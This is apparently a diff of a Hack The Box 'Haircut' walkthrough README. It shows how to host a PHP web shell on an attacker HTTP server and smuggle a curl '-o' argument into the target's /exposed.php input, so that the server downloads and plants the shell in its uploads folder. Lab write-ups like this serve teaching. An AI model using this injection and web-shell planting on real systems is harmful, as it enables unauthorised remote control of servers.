notsag-dev/htb-haircut/README.md

 drwxr-xr-x 2 www-data www-data 4.0K May 22  2017 uploads
 ```

 It seems `uploads` may be a good place where to place a web shell.
-I'm going to use a shell called `Predator.php` I got from this repo https://github.com/JohnTroony/php-webshells.git.
-The first step is to make the shell "curleable" by exposing it through an http server:
+I'm going to use a PHP web shell called `Predator.php` present in this repo https://github.com/JohnTroony/php-webshells.git.
+The first step is to make the shell "curleable" by exposing it through an http server in the attacker:
 ```
-cd php-webshells
+$ cd php-webshells
-python -m SimpleHTTPServer
+$ python -m SimpleHTTPServer
 Serving HTTP on 0.0.0.0 port 8000 ...
 ```

-And now from the input in /exposed.php we curl it to uploads:
+And now from the input in /exposed.php we curl it to uploads leveraging the `-o` (output file) flag:
 ```
 10.10.14.23:8000/Predator.php -o uploads/Predator.php
 ```